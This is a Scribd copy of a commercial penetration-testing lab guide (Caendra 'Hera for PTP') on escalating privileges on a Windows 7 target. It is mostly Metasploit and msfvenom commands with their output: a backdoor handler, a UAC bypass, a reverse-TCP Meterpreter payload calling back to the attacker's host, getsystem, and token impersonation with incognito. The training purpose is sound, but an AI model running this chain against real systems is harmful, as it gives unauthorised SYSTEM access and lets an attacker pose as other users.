Scribd
Upload
76 views18 pages

© 2018 Caendra, Inc. - Hera For PTP - Privilege Escalation

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
76 views18 pages

© 2018 Caendra, Inc. - Hera For PTP - Privilege Escalation

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

© 2018 Caendra, Inc.

| Hera for PTP | Privilege Escalation 1


In this lab, you can practice different privilege escalation techniques. It is important to
know that the remote system has already been compromised and a backdoor has been
installed on it. This means that you already have an exploit to get a Meterpreter session on
the target remote machine.

The lab diagram is the following:

Your machine is directly connected to the remote target network.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 2


• Learn different techniques to escalate privileges

• Privilege escalation through Metasploit modules


• Use privilege escalation exploits - manually -

To guide you during the lab, you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools plus
different methods to achieve the same goal. They are not meant to be used as a
methodology.

Armed with the skills acquired though the tasks, you can achieve the Lab goal.

If this is the first time you are doing this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this document and
check the solutions.

• Metasploit

Labs machines are not connected to the Internet.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 3


Since the lab is mainly focused on privilege escalation, we assume we already have access
to the target machine.

The machine we want to test runs Windows 7. We have already exploited the machine and
we have already installed a backdoor. You can connect to the backdoor with the following
Metasploit settings:

msf > use exploit/multi/handler


msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
smsf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.20
RHOST => 172.16.50.20

This will give us a new meterpreter session on the machine.

Now that we have a session on the machine, we have to verify which privileges we have.
Get as much information about the machine and the session obtained as you can.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 4


In the previous task, you should have gathered some useful information about our session
and the remote machine. For example, we know that:

• we are running under an administrator user,


• the User Account Control is enabled,
• the machine is Windows 7 x64.

With this information, try to escalate your privileges to SYSTEM.

In the previous task, you should have been able to bypass UAC and get SYSTEM privileges on
the machine. Try to manually bypass the UAC protection by using the exploit located in:

/usr/share/metasploit-framework/data/post/bypassuac-x64.exe

Instead of dumping and cracking Windows password hashes, use the incognito module
to get credentials and tokens that may be useful to change your session privileges.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 5


© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 6
Let us configure the handler to get a session on the remote machine 172.50.50.20:

msf > use exploit/multi/handler


msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
smsf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.20
RHOST => 172.16.50.20

This will give us a new meterpreter session on the machine.

msf exploit(handler) > exploit

[*] Started bind handler


[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.50.50.20
[*] Meterpreter session 1 opened (172.50.50.50:32908 -> 172.50.50.20:4450) at 2016-
05-16 18:34:57 +0200

meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 7


Now that we have a working session on the remote machine, we have to get as much
information as we can.

First, let us obtain the Operating System of the remote machine. To do this, let us run the
module sysinfo:

meterpreter > sysinfo


Computer : ELS-WIN7
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Now we know the machine is running Windows 7 (64 bit). Note that if we want to get more
information from the machine, we can run different modules such as winenum.

meterpreter > run winenum


[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.20:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-
WIN7_20160516.4331/ELS-WIN7_20160516.4331.txt
[*] Output of each individual command is saved to
/root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331
[*] Checking if ELS-WIN7 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Enabled
[*] Running Command List ...
[*] running command netstat -vb

[*] Running WMIC Commands ....
[*] running command wmic netclient list brief

[*] Extracting software list from registry
[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or
Windows 7 if not System.
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 8


The module stores a lot of useful information about the machine, which can be found in
your local .msf directory. For example, we can see that we are in the Administrator
group:

root@kali:~/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331# ls net_*

net_accounts.txt net_localgroup_administrators.txt net_share.txt


net_view.txt
net_group_administrators.txt net_localgroup.txt net_user.txt
net_group.txt net_session.txt net_view__domain.txt

root@kali:~/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331# cat
net_localgroup_administrators.txt
Alias name administrators
Comment Administrators have complete and unrestricted access to the
computer/domain

Members

-------------------------------------------------------------------------------
Administrator
eLS
The command completed successfully.

Very useful information can also be obtained by running the module win_privs which
shows all the privileges that we have plus some other information about the system.

meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin Is System UAC Enabled Foreground ID UID


-------- --------- ----------- ------------- ---
False False True 1 "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 9


From the previous screenshot, we can see that the UAC is enabled. This means that our first
goal is to bypass it and then escalate Windows privileges. If we try to run getsystem, the
exploit fails:

meterpreter > getsystem


[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The
following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 10


Now that we know more information about the exploited machine and our session, let us
see how to get SYSTEM privileges on it. We know that UAC is enabled so our first step is to
bypass this security mechanism.

To do so, we can use the module exploit/windows/local/bypassuac as follows (we


just need to set the session number and configure the payload information):

meterpreter > background


[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
SESSION => 1
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 172.50.50.50
LHOST => 172.50.50.50

Now that it has been configured, let us run the module with exploit and see what
happens:

msf exploit(bypassuac) > exploit

[*] Started reverse TCP handler on 172.50.50.50:4444


[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957999 bytes) to 172.50.50.20
[*] Meterpreter session 2 opened (172.50.50.50:4444 -> 172.50.50.20:49158) at 2016-
05-17 10:52:21 +0200

meterpreter >

As we can the exploit successfully bypassed the UAC restrictions. If we run win_privs post
module again (in the new meterpreter session), we can see the output is different; we have
more privileges and the column Is Admin is set to true.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 11


meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin Is System UAC Enabled Foreground ID UID


-------- --------- ----------- ------------- ---
True False True 1 "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeUndockPrivilege

Now that we have these new privileges, let us try to run getsystem again. As we can see,
this time it works and we get SYSTEM privileges.

meterpreter > getsystem


...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 12


We already know that bypassuac module works. It might be useful to understand how this
could be done manually. This means that we have to:

1. Create our own exploit


2. Upload it on the remote machine
3. Use the bypassuac exploit to run it

The first step is to create the payload (an .exe file in this case) that we will run by using
the bypassuac exploit. To do this we can use msfvenom as follows:

root@kali:~/LABS/14# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.50


LPORT=4700 -f exe --platform Windows > rTCP.exe
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

The above command creates an .exe file that when executed, tries a connection back to
our machine at TCP port 4700.

Now we have to upload this file and the bypassuac exploit on the remote machine. In Kali
Linux, the bypassuac file is stored in the following folder:

/usr/share/metasploit-framework/data/post/

root@kali:~/LABS/14# locate bypassuac


/usr/share/metasploit-framework/data/post/bypassuac-x64.dll
/usr/share/metasploit-framework/data/post/bypassuac-x64.exe
/usr/share/metasploit-framework/data/post/bypassuac-x86.dll
/usr/share/metasploit-framework/data/post/bypassuac-x86.exe
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_injection.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_vbs.rb

We know that the machine is running Windows 7 64bit so we have to use the bypassuac-
x64.exe file.

So let us go back into the first Meterpreter session (the one with less privileges) and upload
these two files on the remote machine.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 13


msf exploit(bypassuac) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > cd C:\\Users\\eLS\\Desktop


meterpreter > upload /usr/share/metasploit-framework/data/post/bypassuac-x64.exe
bypassuac-x64.exe
[*] uploading : /usr/share/metasploit-framework/data/post/bypassuac-x64.exe ->
bypassUAC64.exe
[*] uploaded : /usr/share/metasploit-framework/data/post/bypassuac-x64.exe ->
bypassUAC64.exe
meterpreter > upload /root/LABS/14/rTCP.exe rTCP.exe
[*] uploading : rTCP.exe -> rTCP.exe
[*] uploaded : rTCP.exe -> rTCP.exe
meterpreter >

As we can see from the screenshot above, we uploaded the bypassuac exploit,
bypassuac-x64.exe, and the reverse TCP shell, rTCP.exe, in the Desktop folder of the
target machine.

Before trying to bypass the UAC, let us run bypassuac-x64.exe in order to understand
how to use it. If we run it (next screenshot), we can see that we can use different options.
For example, we can run commands allowed by cmd.exe, as well as specific executable
files.

The command (or the file) that is provided will be executed with elevated privileges.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 14


Now that we know which options are required, we want to run our rTCP.exe file. Before
doing this, let us create the handler on our machine:

msf exploit(bypassuac) > use exploit/multi/handler


msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.50
LHOST => 172.50.50.50
msf exploit(handler) > set LPORT 4700
LPORT => 4700
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.50.50.50:4700


[*] Starting the payload handler...

The handler must be configured with the same options set earlier (when we created the
rTCP.exe file).

Now that the handler is running, we can go back into our Meterpreter session, open a new
shell on the remote system and run the bypassuac exploit against our rTCP.exe payload.

msf exploit(handler) > sessions -i 1


[*] Starting interaction with 1...

meterpreter > shell


Process 2744 created.
Channel 8 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\eLS\Desktop>bypassuac-x64.exe /c C:\Users\eLS\Desktop\rTCP.exe
bypassuac-x64.exe /c C:\Users\eLS\Desktop\rTCP.exe

As soon as we run the command, the handler receives the communication and few seconds
later, a new Meterpreter session is created.

[*] Sending stage (957999 bytes) to 172.50.50.20


[*] Meterpreter session 3 opened (172.50.50.50:4700 -> 172.50.50.20:49163) at 2016-
05-17 11:46:00 +0200

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 15


Now that this session has elevated privileges (since the rTCP.exe has been executed
through the bypassuac exploit and is now running as a high-integrity administrator
process); if we try to run getsystem, it works!

We can first, exit our current shell session by typing the “CTRL-Z” key combination,
backgrounding meterpreter, and then interacting with our new meterpreter session:

^Z

Background channel 49? [y/N] y


meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid


Server username: eLS-Win7\eLS
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 16


We have SYSTEM privileges on the machine and, as you already know, this allows us to
collect almost all the information stored in it. One of the most valuable pieces of
information that we can get, and re-use, to run privilege escalation attacks, on a machine is
the user credentials.

Another very useful module is incognito. It allows us to impersonate user tokens. This
may be very useful during our privilege escalation phases because we will not need to
retrieve passwords; we can just impersonate users by stealing their tokens.

We can use incognito with the following command:

meterpreter > use incognito


Loading extension incognito...success.

Let us run help in order to get a list of available commands:

meterpreter > help incognito

Incognito Commands
==================

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

Let us now try to get a list of available tokens and then impersonate a different user. As we
can see in the following screenshot, this can be done by using the commands:

meterpreter > list_tokens -u

Delegation Tokens Available


========================================
eLS-Win7\eLS
NT AUTHORITY\LOCAL SERVICE

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 17


NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available


========================================
NT AUTHORITY\ANONYMOUS LOGON

and then impersonate_token:

meterpreter > getuid


Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token eLS-Win7\\eLS
[+] Delegation token available
[+] Successfully impersonated user eLS-Win7\eLS
meterpreter > getuid
Server username: eLS-Win7\eLS
meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation 18

You might also like